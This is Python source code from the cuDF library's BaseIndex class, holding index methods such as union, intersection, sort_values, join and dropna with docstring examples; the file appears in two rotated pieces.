>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_integer()
True
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_integer()
False
>>> idx = cudf.Index(["Apple", "Mango", "Watermelon"])
>>> idx.is_integer()
False
"""
raise NotImplementedError
def is_floating(self):
"""
Check if the Index is a floating type.
The Index may consist of only floats, NaNs, or a mix of floats,
integers, or NaNs.
Returns
-------
bool
Whether or not the Index only consists of only consists
of floats, NaNs, or a mix of floats, integers, or NaNs.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_floating()
True
>>> idx = cudf.Index([1.0, 2.0, np.nan, 4.0])
>>> idx.is_floating()
True
>>> idx = cudf.Index([1, 2, 3, 4, np.nan], nan_as_null=False)
>>> idx.is_floating()
True
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_floating()
False
"""
raise NotImplementedError
def is_object(self):
"""
Check if the Index is of the object dtype.
Returns
-------
bool
Whether or not the Index is of the object dtype.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["Apple", "Mango", "Watermelon"])
>>> idx.is_object()
True
>>> idx = cudf.Index(["Watermelon", "Orange", "Apple",
... "Watermelon"]).astype("category")
>>> idx.is_object()
False
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_object()
False
"""
raise NotImplementedError
def is_categorical(self):
"""
Check if the Index holds categorical data.
Returns
-------
bool
True if the Index is categorical.
See Also
--------
CategoricalIndex : Index for categorical data.
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["Watermelon", "Orange", "Apple",
... "Watermelon"]).astype("category")
>>> idx.is_categorical()
True
>>> idx = cudf.Index([1, 3, 5, 7])
>>> idx.is_categorical()
False
>>> s = cudf.Series(["Peter", "Victor", "Elisabeth", "Mar"])
>>> s
0 Peter
1 Victor
2 Elisabeth
3 Mar
dtype: object
>>> s.index.is_categorical()
False
"""
raise NotImplementedError
def is_interval(self):
"""
Check if the Index holds Interval objects.
Returns
-------
bool
Whether or not the Index holds Interval objects.
See Also
--------
IntervalIndex : Index for Interval objects.
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> idx = cudf.from_pandas(
... pd.Index([pd.Interval(left=0, right=5),
... pd.Interval(left=5, right=10)])
... )
>>> idx.is_interval()
True
>>> idx = cudf.Index([1, 3, 5, 7])
>>> idx.is_interval()
False
"""
raise NotImplementedError
def _union(self, other, sort=None):
# TODO: As a future optimization we should explore
# not doing `to_frame`
self_df = self.to_frame(index=False, name=0)
other_df = other.to_frame(index=False, name=0)
self_df["order"] = self_df.index
other_df["order"] = other_df.index
res = self_df.merge(other_df, on=[0], how="outer")
res = res.sort_values(
by=res._data.to_pandas_index()[1:], ignore_index=True
)
union_result = cudf.core.index._index_from_data({0: res._data[0]})
if sort is None and len(other):
return union_result.sort_values()
return union_result
def _intersection(self, other, sort=None):
other_unique = other.unique()
other_unique.names = self.names
intersection_result = cudf.core.index._index_from_data(
cudf.DataFrame._from_data(self.unique()._data)
._merge(
cudf.DataFrame._from_data(other_unique._data),
how="inner",
on=self.name,
)
._data
)
if sort is None and len(other):
return intersection_result.sort_values()
return intersection_result
def sort_values(
self,
return_indexer=False,
ascending=True,
na_position="last",
key=None,
):
"""
Return a sorted copy of the index, and optionally return the indices
that sorted the index itself.
Parameters
----------
return_indexer : bool, default False
Should the indices that would sort the index be returned.
ascending : bool, default True
Should the index values be sorted in an ascending order.
na_position : {'first' or 'last'}, default 'last'
Argument 'first' puts NaNs at the beginning, 'last' puts NaNs at
the end.
key : None, optional
This parameter is NON-FUNCTIONAL.
Returns
-------
sorted_index : Index
Sorted copy of the index.
indexer : cupy.ndarray, optional
The indices that the index itself was sorted by.
See Also
--------
cudf.Series.min : Sort values of a Series.
cudf.DataFrame.sort_values : Sort values in a DataFrame.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([10, 100, 1, 1000])
>>> idx
Int64Index([10, 100, 1, 1000], dtype='int64')
Sort values in ascending order (default behavior).
>>> idx.sort_values()
Int64Index([1, 10, 100, 1000], dtype='int64')
Sort values in descending order, and also get the indices `idx` was
sorted by.
>>> idx.sort_values(ascending=False, return_indexer=True)
(Int64Index([1000, 100, 10, 1], dtype='int64'), array([3, 1, 0, 2],
dtype=int32))
Sorting values in a MultiIndex:
>>> midx = cudf.MultiIndex(
... levels=[[1, 3, 4, -10], [1, 11, 5]],
... codes=[[0, 0, 1, 2, 3], [0, 2, 1, 1, 0]],
... names=["x", "y"],
... )
>>> midx
MultiIndex([( 1, 1),
( 1, 5),
( 3, 11),
( 4, 11),
(-10, 1)],
names=['x', 'y'])
>>> midx.sort_values()
MultiIndex([(-10, 1),
( 1, 1),
( 1, 5),
( 3, 11),
( 4, 11)],
names=['x', 'y'])
>>> midx.sort_values(ascending=False)
MultiIndex([( 4, 11),
( 3, 11),
( 1, 5),
( 1, 1),
(-10, 1)],
names=['x', 'y'])
"""
if key is not None:
raise NotImplementedError("key parameter is not yet implemented.")
if na_position not in {"first", "last"}:
raise ValueError(f"invalid na_position: {na_position}")
indices = self.argsort(ascending=ascending, na_position=na_position)
index_sorted = self.take(indices)
if return_indexer:
return index_sorted, indices
else:
return index_sorted
def unique(self):
"""
Return unique values in the index.
Returns
-------
Index without duplicates
"""
return cudf.core.index._index_from_data(
{self.name: self._values.unique()}, name=self.name
)
def join(
self, other, how="left", level=None, return_indexers=False, sort=False
):
"""
Compute join_index and indexers to conform data structures
to the new index.
Parameters
----------
other : Index.
how : {'left', 'right', 'inner', 'outer'}
return_indexers : bool, default False
sort : bool, default False
Sort the join keys lexicographically in the result Index. If False,
the order of the join keys depends on the join type (how keyword).
Returns: index
Examples
--------
>>> import cudf
>>> lhs = cudf.DataFrame({
... "a": [2, 3, 1],
... "b": [3, 4, 2],
... }).set_index(['a', 'b']).index
>>> lhs
MultiIndex([(2, 3),
(3, 4),
(1, 2)],
names=['a', 'b'])
>>> rhs = cudf.DataFrame({"a": [1, 4, 3]}).set_index('a').index
>>> rhs
Int64Index([1, 4, 3], dtype='int64', name='a')
>>> lhs.join(rhs, how='inner')
MultiIndex([(3, 4),
(1, 2)],
names=['a', 'b'])
"""
warnings.warn(
"Index.join is deprecated and will be removed", FutureWarning
)
if isinstance(self, cudf.MultiIndex) and isinstance(
other, cudf.MultiIndex
):
raise TypeError(
"Join on level between two MultiIndex objects is ambiguous"
)
if level is not None and not is_scalar(level):
raise ValueError("level should be an int or a label only")
if isinstance(other, cudf.MultiIndex):
if how == "left":
how = "right"
elif how == "right":
how = "left"
rhs = self.copy(deep=False)
lhs = other.copy(deep=False)
else:
lhs = self.copy(deep=False)
rhs = other.copy(deep=False)
on = level
# In case of MultiIndex, it will be None as
# we don't need to update name
left_names = lhs.names
right_names = rhs.names
# There should be no `None` values in Joined indices,
# so essentially it would be `left/right` or 'inner'
# in case of MultiIndex
if isinstance(lhs, cudf.MultiIndex):
if level is not None and isinstance(level, int):
on = lhs._data.select_by_index(level).names[0]
right_names = (on,) if on is not None else right_names
on = right_names[0]
if how == "outer":
how = "left"
elif how == "right":
how = "inner"
else:
# Both are normal indices
right_names = left_names
on = right_names[0]
lhs.names = left_names
rhs.names = right_names
output = lhs._merge(rhs, how=how, on=on, sort=sort)
return output
def rename(self, name, inplace=False):
"""
Alter Index name.
Defaults to returning new index.
Parameters
----------
name : label
Name(s) to set.
Returns
-------
Index
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, 3], name='one')
>>> index
Int64Index([1, 2, 3], dtype='int64', name='one')
>>> index.name
'one'
>>> renamed_index = index.rename('two')
>>> renamed_index
Int64Index([1, 2, 3], dtype='int64', name='two')
>>> renamed_index.name
'two'
"""
if inplace is True:
self.name = name
return None
else:
out = self.copy(deep=True)
out.name = name
return out
def to_series(self, index=None, name=None):
"""
Create a Series with both index and values equal to the index keys.
Useful with map for returning an indexer based on an index.
Parameters
----------
index : Index, optional
Index of resulting Series. If None, defaults to original index.
name : str, optional
Dame of resulting Series. If None, defaults to name of original
index.
Returns
-------
Series
The dtype will be based on the type of the Index values.
"""
return cudf.Series(
self._values,
index=self.copy(deep=False) if index is None else index,
name=self.name if name is None else name,
)
def get_slice_bound(self, label, side, kind=None):
"""
Calculate slice bound that corresponds to given label.
Returns leftmost (one-past-the-rightmost if ``side=='right'``) position
of given label.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
int
Index of label.
"""
raise NotImplementedError
def __array_function__(self, func, types, args, kwargs):
# check if the function is implemented for the current type
cudf_index_module = type(self)
for submodule in func.__module__.split(".")[1:]:
# point cudf_index_module to the correct submodule
if hasattr(cudf_index_module, submodule):
cudf_index_module = getattr(cudf_index_module, submodule)
else:
return NotImplemented
fname = func.__name__
handled_types = [BaseIndex, cudf.Series]
# check if we don't handle any of the types (including sub-class)
for t in types:
if not any(
issubclass(t, handled_type) for handled_type in handled_types
):
return NotImplemented
if hasattr(cudf_index_module, fname):
cudf_func = getattr(cudf_index_module, fname)
# Handle case if cudf_func is same as numpy function
if cudf_func is func:
return NotImplemented
else:
return cudf_func(*args, **kwargs)
else:
return NotImplemented
def isin(self, values):
"""Return a boolean array where the index values are in values.
Compute boolean array of whether each index value is found in
the passed set of values. The length of the returned boolean
array matches the length of the index.
Parameters
----------
values : set, list-like, Index
Sought values.
Returns
-------
is_contained : cupy array
CuPy array of boolean values.
Examples
--------
>>> idx = cudf.Index([1,2,3])
>>> idx
Int64Index([1, 2, 3], dtype='int64')
Check whether each index value in a list of values.
>>> idx.isin([1, 4])
array([ True, False, False])
"""
# To match pandas behavior, even though only list-like objects are
# supposed to be passed, only scalars throw errors. Other types (like
# dicts) just transparently return False (see the implementation of
# ColumnBase.isin).
if is_scalar(values):
raise TypeError(
"only list-like objects are allowed to be passed "
f"to isin(), you passed a {type(values).__name__}"
)
return self._values.isin(values).values
@classmethod
def from_pandas(cls, index, nan_as_null=None):
"""
Convert from a Pandas Index.
Parameters
----------
index : Pandas Index object
A Pandas Index object which has to be converted
to cuDF Index.
nan_as_null : bool, Default None
If ``None``/``True``, converts ``np.nan`` values
to ``null`` values.
If ``False``, leaves ``np.nan`` values as is.
Raises
------
TypeError for invalid input type.
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> import numpy as np
>>> data = [10, 20, 30, np.nan]
>>> pdi = pd.Index(data)
>>> cudf.Index.from_pandas(pdi)
Float64Index([10.0, 20.0, 30.0, <NA>], dtype='float64')
>>> cudf.Index.from_pandas(pdi, nan_as_null=False)
Float64Index([10.0, 20.0, 30.0, nan], dtype='float64')
"""
if not isinstance(index, pd.Index):
raise TypeError("not a pandas.Index")
ind = cudf.Index(column.as_column(index, nan_as_null=nan_as_null))
ind.name = index.name
return ind
@property
def _constructor_expanddim(self):
return cudf.MultiIndex
def drop_duplicates(
self,
keep="first",
nulls_are_equal=True,
):
"""
Drop duplicate rows in index.
keep : {"first", "last", False}, default "first"
- 'first' : Drop duplicates except for the first occurrence.
- 'last' : Drop duplicates except for the last occurrence.
- ``False`` : Drop all duplicates.
nulls_are_equal: bool, default True
Null elements are considered equal to other null elements.
"""
# This utilizes the fact that all `Index` is also a `Frame`.
# Except RangeIndex.
return self._from_columns_like_self(
drop_duplicates(
list(self._columns),
keys=range(len(self._data)),
keep=keep,
nulls_are_equal=nulls_are_equal,
),
self._column_names,
)
def dropna(self, how="any"):
"""
Drop null rows from Index.
how : {"any", "all"}, default "any"
Specifies how to decide whether to drop a row.
"any" (default) drops rows containing at least
one null value. "all" drops only rows containing
*all* null values.
"""
# This is to be consistent with IndexedFrame.dropna to handle nans
# as nulls by default
data_columns = [
col.nans_to_nulls()
if isinstance(col, cudf.core.column.NumericalColumn)
else col
for col in self._columns
]
return self._from_columns_like_self(
drop_nulls(
data_columns,
how=how,
keys=range(len(data_columns)),
),
self._column_names,
)
def _gather(self, gather_map, nullify=False, check_bounds=True):
"""Gather rows of index specified by indices in `gather_map`.
Skip bounds checking if check_bounds is False.
Set rows to null for all out of bound indices if nullify is `True`.
"""
gather_map = cudf.core.column.as_column(gather_map)
# TODO: For performance, the check and conversion of gather map should
# be done by the caller. This check will be removed in future release.
if not is_integer_dtype(gather_map.dtype):
gather_map = gather_map.astype("int32")
if not _gather_map_is_valid(
gather_map, len(self), check_bounds, nullify
):
raise IndexError("Gather map index is out of bounds.")
return self._from_columns_like_self(
gather(list(self._columns), gather_map, nullify=nullify),
self._column_names,
)
def take(self, indices, axis=0, allow_fill=True, fill_value=None):
"""Return a new index containing the rows specified by *indices*
Parameters
----------
indices : array-like
Array of ints indicating which positions to take.
axis : int
The axis over which to select values, always 0.
allow_fill : Unsupported
fill_value : Unsupported
Returns
-------
out : Index
New object with desired subset of rows.
Examples
--------
>>> idx = cudf.Index(['a', 'b', 'c', 'd', 'e'])
>>> idx.take([2, 0, 4, 3])
StringIndex(['c' 'a' 'e' 'd'], dtype='object')
"""
if axis not in {0, "index"}:
raise NotImplementedError(
"Gather along column axis is not yet supported."
)
if not allow_fill or fill_value is not None:
raise NotImplementedError(
"`allow_fill` and `fill_value` are unsupported."
)
return self._gather(indices)
def _apply_boolean_mask(self, boolean_mask):
"""Apply boolean mask to each row of `self`.
Rows corresponding to `False` is dropped.
"""
boolean_mask = cudf.core.column.as_column(boolean_mask)
if not is_bool_dtype(boolean_mask.dtype):
raise ValueError("boolean_mask is not boolean type.")
return self._from_columns_like_self(
apply_boolean_mask(list(self._columns), boolean_mask),
column_names=self._column_names,
)
def repeat(self, repeats, axis=None):
"""Repeat elements of a Index.
Returns a new Index where each element of the current Index is repeated
consecutively a given number of times.
Parameters
----------
repeats : int, or array of ints
The number of repetitions for each element. This should
be a non-negative integer. Repeating 0 times will return
an empty object.
Returns
-------
Index
A newly created object of same type as caller with repeated
elements.
Examples
--------
>>> index = cudf.Index([10, 22, 33, 55])
>>> index
Int64Index([10, 22, 33, 55], dtype='int64')
>>> index.repeat(5)
Int64Index([10, 10, 10, 10, 10, 22, 22, 22, 22, 22, 33,
33, 33, 33, 33, 55, 55, 55, 55, 55],
dtype='int64')
"""
raise NotImplementedError
def _split_columns_by_levels(self, levels):
if isinstance(levels, int) and levels > 0:
raise ValueError(f"Out of bound level: {levels}")
return (
[self._data[self.name]],
[],
["index" if self.name is None else self.name],
[],
)
def _split(self, splits):
raise NotImplementedError
def _get_result_name(left_name, right_name):
if left_name == right_name:
return left_name
else:
return None
| # Copyright (c) 2021-2022, NVIDIA CORPORATION.
from __future__ import annotations
import pickle
import warnings
from functools import cached_property
from typing import Any, Set
import pandas as pd
import cudf
from cudf._lib.copying import _gather_map_is_valid, gather
from cudf._lib.stream_compaction import (
apply_boolean_mask,
drop_duplicates,
drop_nulls,
)
from cudf._typing import DtypeObj
from cudf.api.types import (
is_bool_dtype,
is_integer,
is_integer_dtype,
is_list_like,
is_scalar,
)
from cudf.core.abc import Serializable
from cudf.core.column import ColumnBase, column
from cudf.core.column_accessor import ColumnAccessor
from cudf.utils import ioutils
from cudf.utils.dtypes import (
is_mixed_with_object_dtype,
numeric_normalize_types,
)
_index_astype_docstring = """\
Create an Index with values cast to dtypes.
The class of a new Index is determined by dtype. When conversion is
impossible, a ValueError exception is raised.
Parameters
----------
dtype : :class:`numpy.dtype`
Use a :class:`numpy.dtype` to cast entire Index object to.
copy : bool, default False
By default, astype always returns a newly allocated object.
If copy is set to False and internal requirements on dtype are
satisfied, the original data is used to create a new Index
or the original Index is returned.
Returns
-------
Index
Index with values cast to specified dtype.
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, 3])
>>> index
Int64Index([1, 2, 3], dtype='int64')
>>> index.astype('float64')
Float64Index([1.0, 2.0, 3.0], dtype='float64')
"""
class BaseIndex(Serializable):
"""Base class for all cudf Index types."""
dtype: DtypeObj
_accessors: Set[Any] = set()
_data: ColumnAccessor
@cached_property
def _values(self) -> ColumnBase:
raise NotImplementedError
def copy(self, deep: bool = True) -> BaseIndex:
raise NotImplementedError
def __len__(self):
raise NotImplementedError
@property
def size(self):
# The size of an index is always its length irrespective of dimension.
return len(self)
@property
def values(self):
return self._values.values
def get_loc(self, key, method=None, tolerance=None):
raise NotImplementedError
def __getitem__(self, key):
raise NotImplementedError()
def __contains__(self, item):
return item in self._values
def get_level_values(self, level):
"""
Return an Index of values for requested level.
This is primarily useful to get an individual level of values from a
MultiIndex, but is provided on Index as well for compatibility.
Parameters
----------
level : int or str
It is either the integer position or the name of the level.
Returns
-------
Index
Calling object, as there is only one level in the Index.
See Also
--------
cudf.MultiIndex.get_level_values : Get values for
a level of a MultiIndex.
Notes
-----
For Index, level should be 0, since there are no multiple levels.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["a", "b", "c"])
>>> idx.get_level_values(0)
StringIndex(['a' 'b' 'c'], dtype='object')
"""
if level == self.name:
return self
elif is_integer(level):
if level != 0:
raise IndexError(
f"Cannot get level: {level} " f"for index with 1 level"
)
return self
else:
raise KeyError(f"Requested level with name {level} " "not found")
@classmethod
def deserialize(cls, header, frames):
# Dispatch deserialization to the appropriate index type in case
# deserialization is ever attempted with the base class directly.
idx_type = pickle.loads(header["type-serialized"])
return idx_type.deserialize(header, frames)
@property
def names(self):
"""
Returns a tuple containing the name of the Index.
"""
return (self.name,)
@names.setter
def names(self, values):
if not is_list_like(values):
raise ValueError("Names must be a list-like")
num_values = len(values)
if num_values > 1:
raise ValueError(
"Length of new names must be 1, got %d" % num_values
)
self.name = values[0]
def _clean_nulls_from_index(self):
"""
Convert all na values(if any) in Index object
to `<NA>` as a preprocessing step to `__repr__` methods.
This will involve changing type of Index object
to StringIndex but it is the responsibility of the `__repr__`
methods using this method to replace or handle representation
of the actual types correctly.
"""
if self._values.has_nulls():
return cudf.Index(
self._values.astype("str").fillna(cudf._NA_REP), name=self.name
)
else:
return self
@property
def is_monotonic(self):
"""Return boolean if values in the object are monotonic_increasing.
This property is an alias for :attr:`is_monotonic_increasing`.
Returns
-------
bool
"""
return self.is_monotonic_increasing
@property
def is_monotonic_increasing(self):
"""Return boolean if values in the object are monotonically increasing.
Returns
-------
bool
"""
raise NotImplementedError
@property
def is_monotonic_decreasing(self):
"""Return boolean if values in the object are monotonically decreasing.
Returns
-------
bool
"""
raise NotImplementedError
@property
def nlevels(self):
"""
Number of levels.
"""
return 1
def _set_names(self, names, inplace=False):
if inplace:
idx = self
else:
idx = self.copy(deep=False)
idx.names = names
if not inplace:
return idx
def set_names(self, names, level=None, inplace=False):
"""
Set Index or MultiIndex name.
Able to set new names partially and by level.
Parameters
----------
names : label or list of label
Name(s) to set.
level : int, label or list of int or label, optional
If the index is a MultiIndex, level(s) to set (None for all
levels). Otherwise level must be None.
inplace : bool, default False
Modifies the object directly, instead of creating a new Index or
MultiIndex.
Returns
-------
Index
The same type as the caller or None if inplace is True.
See Also
--------
cudf.Index.rename : Able to set new names without level.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx
Int64Index([1, 2, 3, 4], dtype='int64')
>>> idx.set_names('quarter')
Int64Index([1, 2, 3, 4], dtype='int64', name='quarter')
>>> idx = cudf.MultiIndex.from_product([['python', 'cobra'],
... [2018, 2019]])
>>> idx
MultiIndex([('python', 2018),
('python', 2019),
( 'cobra', 2018),
( 'cobra', 2019)],
)
>>> idx.names
FrozenList([None, None])
>>> idx.set_names(['kind', 'year'], inplace=True)
>>> idx.names
FrozenList(['kind', 'year'])
>>> idx.set_names('species', level=0, inplace=True)
>>> idx.names
FrozenList(['species', 'year'])
"""
if level is not None:
raise ValueError("Level must be None for non-MultiIndex")
if not is_list_like(names):
names = [names]
return self._set_names(names=names, inplace=inplace)
@property
def has_duplicates(self):
return not self.is_unique
def union(self, other, sort=None):
"""
Form the union of two Index objects.
Parameters
----------
other : Index or array-like
sort : bool or None, default None
Whether to sort the resulting Index.
* None : Sort the result, except when
1. `self` and `other` are equal.
2. `self` or `other` has length 0.
* False : do not sort the result.
Returns
-------
union : Index
Examples
--------
Union of an Index
>>> import cudf
>>> import pandas as pd
>>> idx1 = cudf.Index([1, 2, 3, 4])
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx1.union(idx2)
Int64Index([1, 2, 3, 4, 5, 6], dtype='int64')
MultiIndex case
>>> idx1 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 2, 2], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx1
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue')],
)
>>> idx2 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[3, 3, 2, 2], ["Red", "Green", "Red", "Green"]]
... )
... )
>>> idx2
MultiIndex([(3, 'Red'),
(3, 'Green'),
(2, 'Red'),
(2, 'Green')],
)
>>> idx1.union(idx2)
MultiIndex([(1, 'Blue'),
(1, 'Red'),
(2, 'Blue'),
(2, 'Green'),
(2, 'Red'),
(3, 'Green'),
(3, 'Red')],
)
>>> idx1.union(idx2, sort=False)
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue'),
(3, 'Red'),
(3, 'Green'),
(2, 'Green')],
)
"""
if not isinstance(other, BaseIndex):
other = cudf.Index(other, name=self.name)
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values of "
f"None or False; {sort} was passed."
)
if not len(other) or self.equals(other):
return self._get_reconciled_name_object(other)
elif not len(self):
return other._get_reconciled_name_object(self)
result = self._union(other, sort=sort)
result.name = _get_result_name(self.name, other.name)
return result
def intersection(self, other, sort=False):
"""
Form the intersection of two Index objects.
This returns a new Index with elements common to the index and `other`.
Parameters
----------
other : Index or array-like
sort : False or None, default False
Whether to sort the resulting index.
* False : do not sort the result.
* None : sort the result, except when `self` and `other` are equal
or when the values cannot be compared.
Returns
-------
intersection : Index
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> idx1 = cudf.Index([1, 2, 3, 4])
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx1.intersection(idx2)
Int64Index([3, 4], dtype='int64')
MultiIndex case
>>> idx1 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 3, 4], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx2 = cudf.MultiIndex.from_pandas(
... pd.MultiIndex.from_arrays(
... [[1, 1, 2, 2], ["Red", "Blue", "Red", "Blue"]]
... )
... )
>>> idx1
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(3, 'Red'),
(4, 'Blue')],
)
>>> idx2
MultiIndex([(1, 'Red'),
(1, 'Blue'),
(2, 'Red'),
(2, 'Blue')],
)
>>> idx1.intersection(idx2)
MultiIndex([(1, 'Red'),
(1, 'Blue')],
)
>>> idx1.intersection(idx2, sort=False)
MultiIndex([(1, 'Red'),
(1, 'Blue')],
)
"""
if not isinstance(other, BaseIndex):
other = cudf.Index(other, name=self.name)
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values of "
f"None or False; {sort} was passed."
)
if self.equals(other):
if self.has_duplicates:
return self.unique()._get_reconciled_name_object(other)
return self._get_reconciled_name_object(other)
res_name = _get_result_name(self.name, other.name)
if (self.is_boolean() and other.is_numeric()) or (
self.is_numeric() and other.is_boolean()
):
if isinstance(self, cudf.MultiIndex):
return self[:0].rename(res_name)
else:
return cudf.Index([], name=res_name)
if self.has_duplicates:
lhs = self.unique()
else:
lhs = self
if other.has_duplicates:
rhs = other.unique()
else:
rhs = other
result = lhs._intersection(rhs, sort=sort)
result.name = res_name
return result
def _get_reconciled_name_object(self, other):
"""
If the result of a set operation will be self,
return self, unless the name changes, in which
case make a shallow copy of self.
"""
name = _get_result_name(self.name, other.name)
if self.name != name:
return self.rename(name)
return self
def fillna(self, value, downcast=None):
"""
Fill null values with the specified value.
Parameters
----------
value : scalar
Scalar value to use to fill nulls. This value cannot be a
list-likes.
downcast : dict, default is None
This Parameter is currently NON-FUNCTIONAL.
Returns
-------
filled : Index
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, None, 4])
>>> index
Int64Index([1, 2, <NA>, 4], dtype='int64')
>>> index.fillna(3)
Int64Index([1, 2, 3, 4], dtype='int64')
"""
if downcast is not None:
raise NotImplementedError(
"`downcast` parameter is not yet supported"
)
return super().fillna(value=value)
def to_frame(self, index=True, name=None):
"""Create a DataFrame with a column containing this Index
Parameters
----------
index : boolean, default True
Set the index of the returned DataFrame as the original Index
name : str, default None
Name to be used for the column
Returns
-------
DataFrame
cudf DataFrame
"""
if name is not None:
col_name = name
elif self.name is None:
col_name = 0
else:
col_name = self.name
return cudf.DataFrame(
{col_name: self._values}, index=self if index else None
)
def any(self):
"""
Return whether any elements is True in Index.
"""
return self._values.any()
def to_pandas(self):
"""
Convert to a Pandas Index.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([-3, 10, 15, 20])
>>> idx
Int64Index([-3, 10, 15, 20], dtype='int64')
>>> idx.to_pandas()
Int64Index([-3, 10, 15, 20], dtype='int64')
>>> type(idx.to_pandas())
<class 'pandas.core.indexes.numeric.Int64Index'>
>>> type(idx)
<class 'cudf.core.index.Int64Index'>
"""
return pd.Index(self._values.to_pandas(), name=self.name)
@ioutils.doc_to_dlpack()
def to_dlpack(self):
"""{docstring}"""
return cudf.io.dlpack.to_dlpack(self)
def append(self, other):
"""
Append a collection of Index options together.
Parameters
----------
other : Index or list/tuple of indices
Returns
-------
appended : Index
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1, 2, 10, 100])
>>> idx
Int64Index([1, 2, 10, 100], dtype='int64')
>>> other = cudf.Index([200, 400, 50])
>>> other
Int64Index([200, 400, 50], dtype='int64')
>>> idx.append(other)
Int64Index([1, 2, 10, 100, 200, 400, 50], dtype='int64')
append accepts list of Index objects
>>> idx.append([other, other])
Int64Index([1, 2, 10, 100, 200, 400, 50, 200, 400, 50], dtype='int64')
"""
if is_list_like(other):
to_concat = [self]
to_concat.extend(other)
else:
this = self
if len(other) == 0:
# short-circuit and return a copy
to_concat = [self]
other = cudf.Index(other)
if len(self) == 0:
to_concat = [other]
if len(self) and len(other):
if is_mixed_with_object_dtype(this, other):
got_dtype = (
other.dtype
if this.dtype == cudf.dtype("object")
else this.dtype
)
raise TypeError(
f"cudf does not support appending an Index of "
f"dtype `{cudf.dtype('object')}` with an Index "
f"of dtype `{got_dtype}`, please type-cast "
f"either one of them to same dtypes."
)
if isinstance(self._values, cudf.core.column.NumericalColumn):
if self.dtype != other.dtype:
this, other = numeric_normalize_types(self, other)
to_concat = [this, other]
for obj in to_concat:
if not isinstance(obj, BaseIndex):
raise TypeError("all inputs must be Index")
return self._concat(to_concat)
def difference(self, other, sort=None):
"""
Return a new Index with elements from the index that are not in
`other`.
This is the set difference of two Index objects.
Parameters
----------
other : Index or array-like
sort : False or None, default None
Whether to sort the resulting index. By default, the
values are attempted to be sorted, but any TypeError from
incomparable elements is caught by cudf.
* None : Attempt to sort the result, but catch any TypeErrors
from comparing incomparable elements.
* False : Do not sort the result.
Returns
-------
difference : Index
Examples
--------
>>> import cudf
>>> idx1 = cudf.Index([2, 1, 3, 4])
>>> idx1
Int64Index([2, 1, 3, 4], dtype='int64')
>>> idx2 = cudf.Index([3, 4, 5, 6])
>>> idx2
Int64Index([3, 4, 5, 6], dtype='int64')
>>> idx1.difference(idx2)
Int64Index([1, 2], dtype='int64')
>>> idx1.difference(idx2, sort=False)
Int64Index([2, 1], dtype='int64')
"""
if sort not in {None, False}:
raise ValueError(
f"The 'sort' keyword only takes the values "
f"of None or False; {sort} was passed."
)
other = cudf.Index(other)
if is_mixed_with_object_dtype(self, other):
difference = self.copy()
else:
other = other.copy(deep=False)
other.names = self.names
difference = cudf.core.index._index_from_data(
cudf.DataFrame._from_data(self._data)
._merge(
cudf.DataFrame._from_data(other._data),
how="leftanti",
on=self.name,
)
._data
)
if self.dtype != other.dtype:
difference = difference.astype(self.dtype)
if sort is None and len(other):
return difference.sort_values()
return difference
def is_numeric(self):
"""
Check if the Index only consists of numeric data.
Returns
-------
bool
Whether or not the Index only consists of numeric data.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_numeric()
True
>>> idx = cudf.Index([1, 2, 3, 4.0])
>>> idx.is_numeric()
True
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_numeric()
True
